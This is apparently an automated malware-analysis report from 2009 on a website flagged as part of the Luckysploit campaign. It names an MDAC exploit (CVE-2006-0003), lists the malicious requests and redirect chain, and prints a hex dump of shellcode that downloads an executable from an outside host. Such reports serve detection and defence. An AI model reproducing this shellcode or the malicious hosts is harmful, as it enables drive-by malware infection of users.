Analysis report for http://www.referate.com.ro

Sample Overview

URLhttp://www.referate.com.ro
MD532c7a12ecd8b06c34809e66f00cbeb4e
Analysis Started2009-04-29 18:07:22
Report Generated2009-04-29 18:07:52
Jsand version1.03.02

Detection results

DetectorResult
Jsand 1.03.02malicious

This resource appears to be involved in the Luckysploit malware campaign.

Exploits

NameDescriptionReference
MDACArbitrary file download via the Microsoft Data Access Components (MDAC)CVE-2006-0003

Deobfuscation results

Evals

Writes

Network Activity

Requests

URLStatusContent Type
http://www.referate.com.ro200text/html
http://referate.com.ro/templates/main.js404text/html
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=68241738715&loc=http://www.referate.com.ro200text/javascript
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1680&cb=68986274655&loc=http://www.referate.com.ro200text/javascript
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=47135302922&loc=http://www.referate.com.ro200text/javascript
about:blank200text/html
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=85634348335&loc=http://www.referate.com.ro200text/javascript
http://95.129.144.229/stats/stats.js200text/javascript
http://storage.trafic.ro/js/trafic.js200text/javascript
http://ts.trafic.ro/js/trafic.js?tk=9130691356856244&t_rid=referatecom1200text/javascript
http://tixwagoq.cn/in.cgi?14302text/html
http://gukgifoc.cn/nuc/index.php200text/html
http://95.129.144.229/1302text/html
http://84.244.138.55/ts/in.cgi?sltest302text/html
http://84.244.138.55/ase/?t=13200text/html
http://84.244.138.55/ase/?0154e6e2b1e26433bacc0c80138bb5b9ddf1f1ed674a354263875bd3cf5f58687b7310cfaed3335f13c435b50db7bca892c70483e08d29ff6e5437141c3db24f200text/javascript
http://84.244.138.55/ase/?39104f0b1c41851ca6f30c12a1913f1a8fac6a3c73094f43e8e13a3b663b0a3162fcea46cf6082fcb576a0475e2e524d829b0b0269dad96a21e3c8e713876389200text/javascript
http://tojandglow.com/Advanced_Traffic/out.php?s_id=1302text/html
http://91.212.65.138/in.phpTimeoutapplication/x-empty

Redirects

FromTo
http://tixwagoq.cn/in.cgi?14http://gukgifoc.cn/nuc/index.php
http://95.129.144.229/1http://84.244.138.55/ts/in.cgi?sltest
http://84.244.138.55/ts/in.cgi?sltesthttp://84.244.138.55/ase/?t=13
http://tojandglow.com/Advanced_Traffic/out.php?s_id=1http://91.212.65.138/in.php

ActiveX controls

Shellcode and Malware

HexadecimalASCII
43 43 43 43 eb 0f 5b 33  c9 66 b9 80 01 80 33 ef 
43 e2 fa eb 05 e8 ec ff  ff ff 7f 8b 4e df ef ef 
ef 64 af e3 64 9f f3 42  64 9f e7 6e 03 ef eb ef 
ef 64 03 b9 87 61 a1 e1  03 07 11 ef ef ef 66 aa 
eb b9 87 77 11 65 e1 07  1f ef ef ef 66 aa e7 b9 
87 ca 5f 10 2d 07 0d ef  ef ef 66 aa e3 b9 87 00 
21 0f 8f 07 3b ef ef ef  66 aa ff b9 87 2e 96 0a 
57 07 29 ef ef ef 66 aa  fb af 6f d7 2c 9a 15 66 
aa f7 06 e8 ee ef ef b1  66 9a cb 64 aa eb 85 ee 
b6 64 ba f7 b9 07 64 ef  ef ef bf 87 d9 f5 c0 9f 
07 78 ef ef ef 66 aa f3  64 2a 6c 2f bf 66 aa cf 
87 10 ef ef ef bf 64 aa  fb 85 ed b6 64 ba f7 07 
8e ef ef ef ec aa cf 28  ef b3 91 c1 8a 28 af eb 
97 8a ef ef 10 9a cf 64  aa e3 85 ee b6 64 ba f7 
07 af ef ef ef 85 e8 b7  ec aa cb dc 34 bc bc 10 
9a cf bf bc 64 aa f3 85  ea b6 64 ba f7 07 cc ef 
ef ef 85 ef 10 9a cf 64  aa e7 85 ed b6 64 ba f7 
07 ff ef ef ef 85 10 64  aa ff 85 ee b6 64 ba f7 
07 ef ef ef ef ae b4 bd  ec 0e ec 0e ec 0e ec 0e 
6c 03 eb b5 bc 64 35 0d  18 bd 10 0f ba 64 03 64 
92 e7 64 b2 e3 b9 64 9c  d3 64 9b f1 97 ec 1c b9 
64 99 cf ec 1c dc 26 a6  ae 42 ec 2c b9 dc 19 e0 
51 ff d5 1d 9b e7 2e 21  e2 ec 1d af 04 1e d4 11 
b1 9a 0a b5 64 04 64 b5  cb ec 32 89 64 e3 a4 64 
b5 f3 ec 32 64 eb 64 ec  2a b1 b2 2d e7 ef 07 1b 
11 10 10 ba bd a3 a2 a0  a1 ef 68 74 74 70 3a 2f 
2f 67 75 6b 67 69 66 6f  63 2e 63 6e 2f 6e 75 63 
2f 65 78 65 2e 70 68 70  
CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/gukgifoc.cn/nuc
/exe.php

No additional malware was retrieved.